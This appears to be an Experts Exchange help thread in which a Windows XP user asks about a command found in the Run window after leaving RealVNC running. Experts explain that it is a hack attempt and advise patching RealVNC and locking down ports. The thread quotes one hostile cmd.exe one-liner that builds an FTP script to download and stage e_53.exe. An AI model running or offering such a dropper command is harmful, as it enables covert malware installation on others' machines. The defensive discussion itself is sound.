?
Solved

Have I been hacked ?

Posted on 2006-11-02
6
Medium Priority
?
1,355 Views
Last Modified: 2013-12-04
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean please ?
0
Comment
Question by:EugeneGardner
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
  • 2
6 Comments
 
LVL 9

Accepted Solution

by:
FixingStuff earned 160 total points
ID: 17863044
Looks like there was a hack attempt. the command does the following:
Creates a file called i with the following contents:
open 127.0.0.1 31006
user 1 1
get e_53.exe
quit

Then it trys to run FTP using the above file as a script.

You are either wide open on the internet.... no firewall, or have port forwarding to VNC, which will get port scanned constantly.
Recommendation LOCK DOWN YOUR MACHINE ASAP.  At least change the default port on VNC.

Go here and run SheildsUP to check your open ports to the world.
www.grc.com

FS-
0
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17865217
Thanks.  GRC thinks I am secure (as I am behind a firewall).  My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued as my Real VNS connection is password protected.  And where would the e_53.exe file be dropped ?  I can't find it anywhere.  Another thing I don't understand is what would the point of running a script like that be ?  There is no execute command !
0
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17868447
Good that you are secure!
You probably should go back to GRC sheildsup and check port 5900.  Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
0
2017 Webroot Threat Report

MSPs: Get the facts you need to protect your clients.
The 2017 Webroot Threat Report provides a uniquely insightful global view into the analysis and discoveries made by the Webroot® Threat Intelligence Platform to provide insights on key trends and risks as seen by our users.

 
LVL 21

Assisted Solution

by:briancassin
briancassin earned 80 total points
ID: 17871591
this issue seems to be directly related to Real VNC

 how old is it ?

because their was a serious security flaw found back around May of this year if you have not updated it, it may be that attackers are getting into your system because you are running an unpatched version of VNC.

Source: eWeek

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions. The RealVNC software, which competes with Symantec's pcAnywhere, allows users access a remote computer from a local PC. The company distributes the software in three versions—free, personal and enterprise edition. The vulnerability is caused due to an error within the handling of VNC password authentication requests. It can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.
0
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17872691
Ahh - good point.  I'm running version 4.1.1   I have just downloaded version 4.1.2
Thanks.
0
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17874034
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-
0

Featured Post

Automating Your MSP Business

The road to profitability.
Delivering superior services is key to ensuring customer satisfaction and the consequent long-term relationships that enable MSPs to lock in predictable, recurring revenue. What's the best way to deliver superior service? One word: automation.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

In today's information driven age, entrepreneurs have so many great tools and options at their disposal to help turn good ideas into a thriving business. With cloud-based online services, such as Amazon's Web Services (AWS) or Microsoft's Azure, bus…
Our Group Policy work started with Small Business Server in 2000. Microsoft gave us an excellent OU and GPO model in subsequent SBS editions that utilized WMI filters, OU linking, and VBS scripts. These are some of experiences plus our spending a lo…
If you’ve ever visited a web page and noticed a cool font that you really liked the look of, but couldn’t figure out which font it was so that you could use it for your own work, then this video is for you! In this Micro Tutorial, you'll learn yo…
How to fix incompatible JVM issue while installing Eclipse While installing Eclipse in windows, got one error like above and unable to proceed with the installation. This video describes how to successfully install Eclipse. How to solve incompa…
Suggested Courses
Course of the Month9 days, 7 hours left to enroll

762 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question